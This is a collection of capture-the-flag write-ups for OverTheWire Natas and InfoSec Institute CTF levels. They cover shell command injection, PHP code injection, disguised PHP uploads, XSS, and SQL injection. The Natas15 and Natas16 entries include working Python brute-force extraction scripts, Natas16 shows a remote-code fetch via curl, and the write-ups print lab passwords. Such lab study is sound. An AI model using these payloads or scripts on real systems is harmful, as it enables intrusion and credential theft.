25 |
26 | 2. The way to call `grep` command seems to be vulnerable to commands
27 | injection. Let's try to set value of `needle` parameter to
28 | `; ls -l ;`
29 |
30 | total 480
31 | drwxr-x--- 2 natas9 natas9 4096 Nov 14 10:32 .
32 | drwxr-xr-x 34 root root 4096 Nov 15 17:17 ..
33 | -rw-r----- 1 natas9 natas9 118 Nov 14 10:32 .htaccess
34 | -rw-r----- 1 natas9 natas9 42 Nov 14 10:32 .htpasswd
35 | -rw-r----- 1 natas9 natas9 460878 Nov 14 10:27 dictionary.txt
36 | -rw-r----- 1 natas9 natas9 1952 Nov 14 10:32 index-source.html
37 | -rw-r----- 1 natas9 natas9 1185 Nov 14 10:32 index.php
38 | -rw-r----- 1 natas9 natas9 1165 Nov 14 10:27 index.php.tmpl
39 |
40 | 3. Let's try the same path suggested in Natas7. By injecting the
41 | following code
42 |
43 | ; cat /etc/natas_webpass/natas10 ;
44 |
45 | the result is
46 |
47 | nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu
48 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex2.md:
--------------------------------------------------------------------------------
1 | # A1 Injection
2 |
3 | 1. The goal is to inject the `phpinfo()` function in order to show its output.
4 | After some attemps, seems that `operand1` and `operand2` input fields must
5 | be numbers. On the contrary, `operator` field is not validated. Therefore,
6 | it's realistic to assume that `operator` is the attack's veicle.
7 |
8 | 2. In the normal behaviour, the app replies with
9 |
10 | The result of X + Y is: Z
11 |
12 | where X is the value of `operand1`, Y the value of `operand2` and Z the
13 | result of the operation (maybe generated through `eval()` function).
14 |
15 | 3. Our task is to include the "magic code" in the operator field. Let's try
16 | this
17 |
18 | $ curl -XPOST --data "operand1=1&operand2=1&operator=;phpinfo();" \
19 | http://ctf.infosecinstitute.com/ctf2/exercises/ex2.php
20 | HTTP/1.1 200 OK
21 | Date: Mon, 07 Sep 2015 08:08:54 GMT
22 | Server: Apache/2.4.7 (Ubuntu)
23 | X-Powered-By: PHP/5.5.9-1ubuntu4.6
24 | Set-Cookie: PHPSESSID=gqinri2rihvkjb7jvu4ea9ase7; path=/
25 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
26 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
27 | Pragma: no-cache
28 | Vary: Accept-Encoding
29 | Content-Length: 7561
30 | Content-Type: text/html
31 |
32 | [...]
33 |
34 |
35 |
You managed to complete level 2. You will be redirected to level 3 in 10 seconds.
34 |
35 |
36 |
37 |
--------------------------------------------------------------------------------
/overthewire/natas/natas05.md:
--------------------------------------------------------------------------------
1 | # Natas5
2 |
3 | * user: `natas5`
4 | * pass: `iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq`
5 | * url: `http://natas5.natas.labs.overthewire.org`
6 | * flag: `aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1`
7 |
8 | ## Procedure
9 |
10 | 1. When accessing the page, the following message is received
11 |
12 | Access disallowed. You are not logged in
13 |
14 | It's common to use cookies to check if a user is logged in. So let's try
15 | with a sniffer (e.g. Wireshark) if specific cookie is required.
16 |
17 | 2. Bingo! When page is accessed, cookie `loggedin=0` is sent. Let's try to
18 | change it in 1
19 |
20 | $ curl -u natas5:iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq -b loggedin=1 http://natas5.natas.labs.overthewire.org/
21 |
22 |
23 |
24 |
25 |
26 |
27 |
28 |
29 |
30 |
31 |
32 |
natas5
33 |
34 | Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1
35 |
36 |
37 |
38 | Seems to work...
39 |
--------------------------------------------------------------------------------
/overthewire/natas/natas13.md:
--------------------------------------------------------------------------------
1 | # Natas13
2 |
3 | * user: `natas13`
4 | * pass: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY`
5 | * url: `http://natas13.natas.labs.overthewire.org`
6 | * flag: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1`
7 |
8 | ## Procedure
9 |
10 | 1. It seems to be the same approach of Natas12 but now, the file's
11 | signature is checked with the PHP function `exif_imagetype()`.
12 | According to documentation indeed, such function
13 |
14 | reads the first bytes of an image and checks its signature.
15 |
16 | 2. JPEG signature is `0xFF 0xD8 0xFF 0xE0`, so let's start by forging
17 | a JPEG file
18 |
19 | $ echo -e "\xFF\xD8\xFF\xE0" > image.php
20 | $ file image.php
21 | image.php: JPEG image data
22 |
23 | Now append the PHP code
24 |
25 | $ echo -n '' >> image.php
26 | $ file image.php
27 | image.php: JPEG image data
28 |
29 | 3. Upload the "image" as in Natas12
30 |
31 | $ curl -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY -F "MAX_FILE_SIZE=1000" -F "filename=image.php" -F "uploadedfile=@./image.php" http://natas13.natas.labs.overthewire.org
32 |
33 |
34 | [cut]
35 |
36 |
37 |
natas13
38 |
39 | For security reasons, we now only accept image files!
43 |
44 |
45 |
46 | and check the content
47 |
48 | $ curl -u natas13:jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY http://natas13.natas.labs.overthewire.org/upload/7q86uwt60z.php
49 | ����Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1
50 |
--------------------------------------------------------------------------------
/overthewire/natas/natas10.md:
--------------------------------------------------------------------------------
1 | # Natas10
2 |
3 | * user: `natas10`
4 | * pass: `nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu`
5 | * url: `http://natas10.natas.labs.overthewire.org`
6 | * flag: `U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK`
7 |
8 | ## Procedure
9 |
10 | 1. It seems to be similar to Natas9 but here chars `;`, `&` and `|`
11 | are not allowed. Let's try with other *magic* symbols...
12 |
13 | 2. By inserting `*` seems that something is mooving in the right way.
14 | Indeed, `grep` supports wildcards, so let's try with `.*`...
15 |
16 | 3. Well! Files in current dir are listed, but `dictionary.txt` is huge
17 |
18 | .htaccess:AuthType Basic
19 | .htaccess: AuthName "Authentication required"
20 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
21 | .htaccess: require valid-user
22 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg.
23 | dictionary.txt:African
24 | dictionary.txt:Africans
25 | dictionary.txt:Allah
26 | dictionary.txt:Allah's
27 | dictionary.txt:American
28 | ...
29 |
30 | 4. Let's try to exclude it by using `.* #`...
31 |
32 | .htaccess:AuthType Basic
33 | .htaccess: AuthName "Authentication required"
34 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
35 | .htaccess: require valid-user
36 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg.
37 |
38 | 5. Yep! I feel the smell of the flag! As is Natas7 and Natan9, now
39 | password should be in
40 |
41 | /etc/natas_webpass/natas11
42 |
43 | Let's try by injecting `.* /etc/natas_webpass/natas11 #`
44 |
45 | .htaccess:AuthType Basic
46 | .htaccess: AuthName "Authentication required"
47 | .htaccess: AuthUserFile /var/www/natas/natas10//.htpasswd
48 | .htaccess: require valid-user
49 | .htpasswd:natas10:$1$sDWfJg4Y$ewf9jvw0ChWUA3KARHisg.
50 | /etc/natas_webpass/natas11:U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK
51 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex13.md:
--------------------------------------------------------------------------------
1 | # A10 Unvalidated Redirects and Forwards
2 |
3 | 1. Ok. We were redirected (in some way) to
4 |
5 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13-task.php
6 |
7 | Let's take a look at the link for Level 13 in the levels' dropdown list
8 |
9 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ex13-task.php
10 |
11 | Interesting!!! The redirect is performed by using `redirect` parameter.
12 |
13 | 2. Let's try with
14 |
15 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=http://mysite.com
16 |
17 | For sure, we receive
18 |
19 | Bad Redirect Parameter
20 |
21 | Maybe the approach of [Level 4](./ex4.md)...
22 |
23 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=HtTp://mysite.com
24 | ^^^^
25 | Grrr...
26 |
27 | Bad Redirect Parameter
28 |
29 | Seems that value of `redirect` is validated by using a case-insensitive
30 | `regex`. Let's try with
31 |
32 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=ftp://mysite.com
33 | ^^^
34 |
35 | Ops... No error message! Seems that not checks are performed on the scheme.
36 |
37 | 2. By Googling I found the man page of the PHP function
38 | [`parse_url()`](http://php.net/manual/en/function.parse-url.php). If you take
39 | a look at `Example #2`, you can see that URLs may be also specified without
40 | the scheme.
41 |
42 | 3. Let's try this
43 |
44 | http://ctf.infosecinstitute.com/ctf2/exercises/ex13.php?redirect=//mysite.com
45 | ^^
46 |
47 | Yep!
48 |
49 | Congratulations, you just completed the last level. You are a true Ninja warrior now.
50 |
51 | [Go to Ex12](./ex12.md)
52 |
53 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex1.md:
--------------------------------------------------------------------------------
1 | # A3 Cross-Site Scripting (XSS)
2 |
3 | 1. Let's try to use `test` as "Site Name" and `http://www.example.com` as
4 | "Site URL". It works as expected.
5 |
6 | 2. Now, change `test` in `` just to check if input validation in present.
7 | Is it...
8 |
9 | 3. At first, we need to disable input validation. According to the source,
10 | "Site Name" is validated against a RegEx (`[a-zA-Z]+`). To allow "special"
11 | characters, two approaches can be followed:
12 |
13 | * Change the RegEx in `.+`
14 |
15 |
16 | ^^
17 |
18 | * Add the `formnovalidate` attribute to the `submit` input
19 |
20 |
21 | ^^^^^^^^^^^^^^
22 |
23 | Both the approaches can be implemented by using FF's Web Developer tools.
24 |
25 | 4. Let's try to inject the solution's code `` by
26 | using "Site Name" field. It works, but unfortunately `<` and `>` characters
27 | are escaped (see `../js/ex1.js:18-19`)
28 |
29 | var siteName = $(".ex1 input[type='text']").val().trim().replace(//g, ">");
30 | var siteURL = $(".ex1 input[type='url']").val().trim().replace(//g, ">");
31 |
32 | 5. To bypass escaping, we can use the JS debugger provided by FF. Let's add a
33 | breackpoint at line 18. After the code execution (the string escaping) we
34 | can manually modify the value of "Site Name" by re-inserting the original
35 | value without escapes (``). That's it!
36 |
37 | [Go to Exercise2](./ex2.md)
38 |
39 |
--------------------------------------------------------------------------------
/overthewire/natas/natas25.md:
--------------------------------------------------------------------------------
1 | # Natas25
2 |
3 | * user: `natas25`
4 | * pass: `GHF6X7YwACaYYssHVY05cFq83hRktl4c`
5 | * url: [http://natas25.natas.labs.overthewire.org](http://natas25:GHF6X7YwACaYYssHVY05cFq83hRktl4c@natas25.natas.labs.overthewire.org)
6 | * flag: `oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T`
7 |
8 | ## Procedure
9 |
10 | 1. At first look, seems that `lang` parameter could be the vehicle of
11 | the attack. According to the source code, some checks are performed
12 | on it...
13 |
14 | 2. Firstly, we're not allowed to include `natas_webpass` string, so
15 | direct access to `/etc/natas_webpass/natas26` file is not feasible.
16 |
17 | 3. Secondly, a check against the presence of `../` is performed. In
18 | this case, all the occurrences of `../` in `$filename` are removed.
19 |
20 | 4. BINGO! The string "`..././`" will be converted in "`../`", so we are
21 | now allowed to fully visit the file system, and then, also the log
22 | file generated by `logRequest()`.
23 |
24 | 5. Since `/etc/natas_webpass/natas26` is not directly accessible, we
25 | can try to access it via the log file. Fortunately, `logRequest()`
26 | function does not perform any check on the variable
27 | `$_SERVER['HTTP_USER_AGENT']`, so we can use it to inject the
28 | PHP code
29 |
30 |
31 |
32 | 6. Well. The attack is defined. A Python script
33 | ([natas25.py](./scripts/natas25.py)) will do it on behalf us.
34 |
35 | $ python scripts/natas25.py
36 |
37 |
38 |
39 |
40 | [cut]
41 |
42 | [01.05.2015 10::59:23] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
43 | "Illegal file access detected! Aborting!"
44 | [01.05.2015 10::59:23] oGgWAJ7zcGT28vYazGo4rkhOPDhBu34T
45 | "Directory traversal attempt! fixing request."
46 |
47 | [cut]
48 |
49 |
50 |
51 |
52 |
53 |
54 |
55 |
--------------------------------------------------------------------------------
/infosec/n00bs/l15.md:
--------------------------------------------------------------------------------
1 | # Flag
2 |
3 | * flag: infosec_flagis_rceatomized
4 | * bonus flag: INFOSECFLAGISMORSECODETONES
5 |
6 | # Procedure
7 |
8 | 1. By inserting `google.com` the result seems to be a standard Dig output.
9 |
10 | 2. Let's try to insert `-h` option... It works! (the man page is shown)
11 |
12 | 3. Let's try to insert `; ls -al`. If correct, at server side it should be
13 | equivalent to
14 |
15 | $ dig; ls -al
16 |
17 | 4. Yep! Directory listing works! Moreover, a suspect file named `.hey` is
18 | present.
19 |
20 | 5. Download it
21 |
22 | $ wget http://ctf.infosecinstitute.com/levelfifteen/.hey
23 | $ cat .hey
24 | Miux+mT6Kkcx+IhyMjTFnxT6KjAa+i6ZLibC
25 |
26 | 6. Should `ZLibC` be a hint? I'm still working on it... Grrr...
27 |
28 | 7. Meanwhile (I'm curious), let's try take a look in the file system...
29 |
30 | 8. Wow! In `/misc` there is the `readme.wav` file (never used in past levels).
31 | By hearing it, seems to be newly a Morse code
32 |
33 | .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... . -.-. --- -.. . - --- -. . ...
34 |
35 | 9. Decode it
36 |
37 | .. -. ..-. --- ... . -.-. ..-. .-.. .- --. .. ... -- --- .-. ... . -.-. --- -.. . - --- -. . ...
38 | I N F O S E C F L A G I S M O R S E C O D E T O N E S
39 |
40 | 10. After spending many time by trying several combinations of ZLib and GZip
41 | headers, I realised that ZLibC is a decoy!!! Let's try to decrypt it by
42 | trying several methods...
43 |
44 | 11. Googling on the web, I found this interesting web site
45 |
46 | http://crypo.in.ua/tools/
47 |
48 | that offers several encryption/decryption for many algorithms
49 |
50 | 12. After trying (without success) popular encryptors, I started with fastest
51 | encryptors and with `ATOM 128`... BINGO!!!
52 |
53 | http://crypo.in.ua/tools/eng_atom128c.php
54 |
--------------------------------------------------------------------------------
/overthewire/natas/natas14.md:
--------------------------------------------------------------------------------
1 | # Natas14
2 |
3 | * user: `natas14`
4 | * pass: `Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1`
5 | * url: `http://natas14.natas.labs.overthewire.org`
6 | * flag: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J`
7 |
8 | ## Procedure
9 |
10 | 1. By analysing the source code, catches the eye a non parametrised
11 | SQL query
12 |
13 | $query = "SELECT * from users where username=\"".$_REQUEST["username"]."\" and password=\"".$_REQUEST["password"]."\"";
14 |
15 | that means [SQL Injection](http://en.wikipedia.org/wiki/SQL_injection)
16 |
17 | 2. Furthermore, it's possible to enable a simple debugging mode by
18 | providing through a `GET` `username`, `password` and `debug`
19 | parameters. So let's try...
20 |
21 | $ curl -u natas14:Lg96M10TdfaPyVBkJdjymbllQ5L6qdl1 "http://natas14.natas.labs.overthewire.org/?debug&username=alice&password=s3cr3t"
22 |
23 |
24 | [cut]
25 |
26 |
27 |
natas14
28 |
29 | Executing query: SELECT * from users where username="alice" and password="s3cr3t" Access denied!
44 | Executing query: SELECT * from users where username="1" or "a"="a"#" and password="NotNecessary" Successful login! The password for natas15 is AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J
43 |
44 |
45 |
46 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex7.md:
--------------------------------------------------------------------------------
1 | # A3 Cross-Site Scripting (XSS)
2 |
3 | 1. Let's take a look at the form's source code
4 |
5 |
16 |
17 | As we can see, there is an hidden field named `action`
18 |
19 |
20 |
21 | Seems to be interesting...
22 |
23 | 2. If we're lucky, the hidden field's value is set by referring the
24 | `$_SERVER["PHP_SELF"]` variable. To check it, we could try with the
25 | following URL
26 |
27 | http://ctf.infosecinstitute.com/ctf2/exercises/ex7.php/foo
28 |
29 | Yep! As we can see, there are some changes in the web page's rendering.
30 | Furthermore, the form's source code changed in
31 |
32 |
41 |
42 | This will be our attack's vehicle.
43 |
44 | 3. Our goal now is to create a "magic" URL that will include the code
45 |
46 |
YOUR NAME HERE
47 |
48 | in the page. Let's try by visiting the URL
49 |
50 | http://ctf.infosecinstitute.com/ctf2/exercises/ex7.php/'>foo
51 |
52 | As we can see, the string `foo '>` appeared between the password field and
53 | the buttons. It seems to be the right way. Let's try with
54 |
55 | http://ctf.infosecinstitute.com/ctf2/exercises/ex7.php/'>
GotTheMilk
56 |
57 | Yep!
58 |
59 | [Go to Ex6](./ex6.md) | [Go to Ex8](./ex8.md)
60 |
61 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex9.md:
--------------------------------------------------------------------------------
1 | # A2 Broken Authentication and Session Management
2 |
3 | 1. The hint *It seems you were automatically logged in* suggests us that
4 | something is (or should be) stored at client side. Let's try to take a look
5 | in the cookies
6 |
7 | $ curl -i http://ctf.infosecinstitute.com/ctf2/exercises/ex9.php
8 | HTTP/1.1 200 OK
9 | Date: Tue, 15 Sep 2015 08:40:18 GMT
10 | Server: Apache/2.4.7 (Ubuntu)
11 | X-Powered-By: PHP/5.5.9-1ubuntu4.6
12 | Set-Cookie: PHPSESSID=d309chl30f9toku705pl0s5gh5; path=/
13 | Expires: Thu, 19 Nov 1981 08:52:00 GMT
14 | Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
15 | Pragma: no-cache
16 | Set-Cookie: user=Sk9ITitET0U%3D; expires=Tue, 15-Sep-2015 09:40:18 GMT; Max-Age=3600; path=/; httponly
17 | Vary: Accept-Encoding
18 | Content-Length: 4701
19 | Content-Type: text/html
20 |
21 |
22 |
23 |
24 |
25 | [...]
26 |
27 | 2. What about `user=Sk9ITitET0U%3D`? It seems to be a Base64 string. Let's try
28 | to decode it
29 |
30 | $ echo "Sk9ITitET0U=" | openssl base64 -d
31 | JOHN+DOE
32 |
33 | Yep!
34 |
35 | 3. We need to impersonate **Mary Jane**, so the cookie value should be
36 |
37 | $ echo -n "MARY+JANE" | openssl base64 -e
38 | TUFSWStKQU5F
39 |
40 | 4. Let's try if everything works...
41 |
42 | $ curl -i --cookie "user=TUFSWStKQU5F" http://ctf.infosecinstitute.com/ctf2/exercises/ex9.php
43 | HTTP/1.1 200 OK
44 | Date: Tue, 15 Sep 2015 08:46:20 GMT
45 | Server: Apache/2.4.7 (Ubuntu)
46 | X-Powered-By: PHP/5.5.9-1ubuntu4.6
47 |
48 | [...]
49 |
50 |
Hello, Mary Jane.
51 |
52 |
53 |
Name
54 |
Age
55 |
Nationality
56 |
57 |
58 |
Mary Jane
59 |
18
60 |
American
61 |
62 |
.
63 |
64 | [...]
65 |
66 |
Oh yeah, you actually made it! You know the drill.
67 |
68 | [...]
69 |
70 | Nice! :-D
71 |
72 |
73 | [Go to Ex8](./ex8.md) | [Go to Ex10](./ex10.md)
74 |
75 |
--------------------------------------------------------------------------------
/overthewire/natas/natas04.md:
--------------------------------------------------------------------------------
1 | # Natas4
2 |
3 | * user: `natas4`
4 | * pass: `Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ`
5 | * url: `http://natas4.natas.labs.overthewire.org`
6 | * flag: `iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq`
7 |
8 | ## Procedure
9 |
10 | 1. By getting the page's source code, we can see that there's nothing
11 | interesting. By clicking on `Refresh page`, page content changes from
12 |
13 | Access disallowed. You are visiting from "" while [...]
14 |
15 | to
16 |
17 | Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/" while [...]
18 |
19 | then if newly click on `Refresh page` it changes in
20 |
21 | Access disallowed. You are visiting from "http://natas4.natas.labs.overthewire.org/index.php" while [...]
22 |
23 | Seems that it's related to `Referer` HTTP header. Indeed, by repeating the
24 | procedure with a sniffer, we can see that `Referer` header is set.
25 |
26 | 2. The page suggests us that *authorized users should come only from [...]*.
27 | Let's try to set the `Referer` header to desired value
28 | (`http://natas5.natas.labs.overthewire.org/`)
29 |
30 | $ curl -u natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ --referer http://natas5.natas.labs.overthewire.org/ http://natas4.natas.labs.overthewire.org
31 |
32 |
33 |
34 |
35 |
36 |
37 |
38 |
39 |
40 |
41 |
42 |
natas4
43 |
44 |
45 | Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq
46 |
47 |
63 |
64 |
65 |
--------------------------------------------------------------------------------
/overthewire/natas/natas12.md:
--------------------------------------------------------------------------------
1 | # Natas12
2 |
3 | * user: `natas12`
4 | * pass: `EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3`
5 | * url: `http://natas12.natas.labs.overthewire.org`
6 | * flag: `jmLTY0qiPZBbaKc9341cqPQZBJv7MQbY`
7 |
8 | ## Procedure
9 |
10 | 1. This level allows images, or better, files upload and provides a
11 | link to them. By taking a look in the source code, it's possible to
12 | understand how the destination path is generated. In few words,
13 | uploaded files will be available at
14 |
15 | /upload/.
16 |
17 | 2. While `` is random, `` is determined from
18 | the form's hidden field `filename`. So, let's try to verify it.
19 | Create a file called `image.php` and upload it
20 |
21 | $ echo "" > image.php
22 | $ curl -u natas12:EDXp0pS26wLKHZy1rDBPUZk0RKfLGIR3 -F "MAX_FILE_SIZE=1000" -F "filename=image.php" -F "uploadedfile=@./image.php" http://natas12.natas.labs.overthewire.org
23 |
24 |
25 | [cut]
26 |
27 |
28 |
Gosh, you were fast. You completed Level 5. You will be redirected to level 6 in 10 seconds.
80 |
81 |
82 | [...]
83 |
84 | Nice!!!
85 |
86 | [Go to Ex4](./ex4.md) | [Go to Ex6] (./ex6.md)
87 |
88 |
--------------------------------------------------------------------------------
/overthewire/natas/natas16.md:
--------------------------------------------------------------------------------
1 | # Natas16
2 |
3 | * user: `natas16`
4 | * pass: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh`
5 | * url: `http://natas16.natas.labs.overthewire.org`
6 | * flag: `8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw`
7 |
8 | ## Procedure
9 |
10 | 1. Our objective is to get the content of file `/etc/natas_webpass/natas17`.
11 |
12 | 1. Similarly to Natas9 and Natas10, there is a BASH script to be
13 | injected. Even if a security check is performed to identify
14 | some "special" characters, `$`, `(` and `)` are allowed...
15 |
16 | 2. Firstly, we can try to load the code to be injected from an external
17 | resource by passing as value of `needle` parameter the following
18 | string
19 |
20 | $(curl -s http://www.example.com/code_to_inject.txt)
21 |
22 | where `code_to_inject.txt` could contain something like
23 |
24 | Africans" dictionary.txt ; cat /etc/natas_webpass/natas17 ; grep -i "Africans
25 |
26 | Unfortunately, this way seems to be not followable (probably due to
27 | security settings on target machine).
28 |
29 | 3. Let's try a brute-force approach (like Natas15). Our idea is to
30 | create a switch that informs us whether a token is present in the
31 | flag.
32 |
33 | 4. If we try to check existence of `Africans` we receive the following
34 | result
35 |
36 | $ curl -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -d "needle=Africans" http://natas16.natas.labs.overthewire.org
37 | [cut]
38 |
39 | Africans
40 |
41 | [cut]
42 |
43 | while with `XAfricans` we receive
44 |
45 | $ curl -u natas16:WaIHEacj63wnNIBROHeqi3p9t0m5nhmh -d "needle=XAfricans" http://natas16.natas.labs.overthewire.org
46 | [cut]
47 |
48 |
49 | [cut]
50 |
51 | The base idea of our switch is to check the string `XAfricans` where
52 | `X` could be `NULL`. In this way, we'll have two states.
53 |
54 | 5. `X` will be the result of
55 |
56 | grep -E ^.* /etc/natas_webpass/natas17
57 |
58 | Indeed, if `token` is at the beginning of password, value of `token`
59 | will be shown. Otherwise, nothing is shown.
60 |
61 | 6. Our brute-force consists in assigning to `needle` the iteration (over
62 | the charset `A-Za-z0-9`) of the following command
63 |
64 | $(grep -E ^.* /etc/natas_webpass/natas17)Africans
65 |
66 | Of course, Python will help us
67 |
68 | import requests
69 |
70 | target = 'http://natas16.natas.labs.overthewire.org'
71 | charset_0 = (
72 | '0123456789' +
73 | 'abcdefghijklmnopqrstuvwxyz' +
74 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
75 | )
76 |
77 | p = ''
78 | i = 0
79 | while len(p) != 32:
80 | while i < len(charset_0):
81 | c = charset_0[i]
82 | needle = ('$(grep -E ^%s%c.* /etc/natas_webpass/natas17)Africans' % (p, c))
83 | r = requests.get(target,
84 | auth=('natas16','WaIHEacj63wnNIBROHeqi3p9t0m5nhmh'),
85 | params={"needle": needle}
86 | )
87 | if "Africans" not in r.text:
88 | p += c
89 | print ('P: ' + p.ljust(32, '*'))
90 | i = 0
91 | else:
92 | i += 1
93 |
94 | 7. This is the final result
95 |
96 | $ python natas16.py
97 | P: 8*******************************
98 | ...
99 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9**
100 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9c*
101 | P: 8Ps3H0GWbn5rd9S7GmAdgQNdkhPkq9cw
102 |
--------------------------------------------------------------------------------
/overthewire/natas/natas15.md:
--------------------------------------------------------------------------------
1 | # Natas15
2 |
3 | * user: `natas15`
4 | * pass: `AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J`
5 | * url: `http://natas15.natas.labs.overthewire.org`
6 | * flag: `WaIHEacj63wnNIBROHeqi3p9t0m5nhmh`
7 |
8 | ## Procedure
9 |
10 | 1. Similarly to Natas14, also in this level a SQL Injection is feasible.
11 | Indeed, we have a text field where users' existence is checkable via
12 | a not parametrised SQL query.
13 |
14 | 2. We're looking for Natas16 password, so let's try if user `natas16`
15 | exists...
16 |
17 | $ curl -u natas15:AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J http://natas15.natas.labs.overthewire.org/?username=natas16
18 |
19 | [cut]
20 |
23 |
24 |
25 |
26 | 3. Well. Differently from Natas16, poisoned query's execution not
27 | provides any direct information. This means that we have to try a
28 | brute force attack.
29 |
30 | 4. First of all we have to identify the charset containing only chars
31 | used in the password. To do that, we can exploit the operator `LIKE`
32 | allowing us to perform pattern matching. In practice, SQL code that
33 | we'll inject is
34 |
35 | natas16" AND password LIKE BINARY "%%" "
36 |
37 | 5. In this case, Python can help us. The following script performs a
38 | brute force attack to identify the password charset
39 |
40 | import requests
41 |
42 | target = 'http://natas15.natas.labs.overthewire.org'
43 | charset_0 = (
44 | '0123456789' +
45 | 'abcdefghijklmnopqrstuvwxyz' +
46 | 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
47 | )
48 | charset_1 = ''
49 |
50 | for c in charset_0:
51 | username = ('natas16" AND password LIKE BINARY "%' + c +'%" "')
52 | r = requests.get(target,
53 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
54 | params={"username": username}
55 | )
56 | if "This user exists" in r.text:
57 | charset_1 += c
58 | print ('CSET: ' + charset_1.ljust(len(charset_0), '*'))
59 |
60 | By executing the script, final result will be
61 |
62 | CSET: 0*************************************************************
63 | CSET: 03************************************************************
64 | ...
65 | CSET: 03569acehijmnpqtwBEHINORW*************************************
66 |
67 | 6. Well. The sub-charset is
68 |
69 | 03569acehijmnpqtwBEHINORW
70 |
71 | Now let's try to perform a brute force attack against a 32 chars
72 | string (previous passwords were 32 chars strings) with this Python
73 | script
74 |
75 | import requests
76 |
77 | target = 'http://natas15.natas.labs.overthewire.org'
78 | charset_1 = "03569acehijmnpqtwBEHINORW"
79 |
80 | password = ""
81 | while len(password) != 32:
82 | for c in charset_1:
83 | t = password + c
84 | username = ('natas16" AND password LIKE BINARY "' + t +'%" "')
85 | r = requests.get(target,
86 | auth=('natas15','AwWj0w5cvxrZiONgZ9J5stNVkmxdk39J'),
87 | params={"username": username}
88 | )
89 | if "This user exists" in r.text:
90 | print ('PASS: ' + t.ljust(32, '*'))
91 | password = t
92 | break
93 |
94 | Run it
95 |
96 | $ python natas15.py
97 | PASS: W*******************************
98 | PASS: Wa******************************
99 | PASS: WaI*****************************
100 | ...
101 | PASS: WaIHEacj63wnNIBROHeqi3p9t0m5nhmh
102 |
--------------------------------------------------------------------------------
/infosec/ctf2/ex8.md:
--------------------------------------------------------------------------------
1 | # File inclusion
2 |
3 | 1. The first step is to analyse the application. Let's try in uploading a real
4 | image file. Of course the application replies us with
5 |
6 | File uploaded successfully
7 |
8 | Take a note...
9 |
10 | 2. Now, we'll try in renaming our file with a non-image extension
11 |
12 | $ cp duck_43ed2fd0.jpg duck_43ed2fd0.jpg.txt
13 |
14 | Also in this case, the application replies us with
15 |
16 | File uploaded successfully
17 |
18 | It seems that a check on the file's signature is performed. Take a note...
19 |
20 | 3. Let's create a fake image file containing the JS code that we
21 | want to be executed
22 |
23 | $ echo "" > script.js
24 | $ cp script.js f737c5cf_script.js
25 |
26 | We added the `f737c5cf_` prefix just to be sure that we're working with our
27 | file. If we try to upload it, we receive the message
28 |
29 | Your file does not have the proper extension.
30 |
31 | Take a note...
32 |
33 | 4. Let's change the file extension
34 |
35 | $ cp f737c5cf_script.js f737c5cf_script.js.png
36 |
37 | and try to upload it. The result is
38 |
39 | File uploaded successfully
40 |
41 | Well!!! We was able to upload a JS code on the server. Now, we need to find
42 | a way to execute it.
43 |
44 | 5. By clicking on `Chess 1` link, we can see that the URL changes in
45 |
46 | http://ctf.infosecinstitute.com/ctf2/exercises/ex8.php?attachment_id=1
47 |
48 | So, the uploaded files are referenced with an `attachment_id`. Let's try in
49 | using the 120 as id.
50 |
51 | http://ctf.infosecinstitute.com/ctf2/exercises/ex8.php?attachment_id=120
52 |
53 | We'll receive
54 |
55 | This attachment is currently under review by our editors.
56 |
57 | Take a note...
58 |
59 | 6. Go back to the "Chess 1" page and take a look at the source code. We can see
60 | that image files are stored under
61 |
62 | http://ctf.infosecinstitute.com/ctf2/ex8_assets/img/
63 |
64 | So, let's try in accessing the image that we just uploaded
65 |
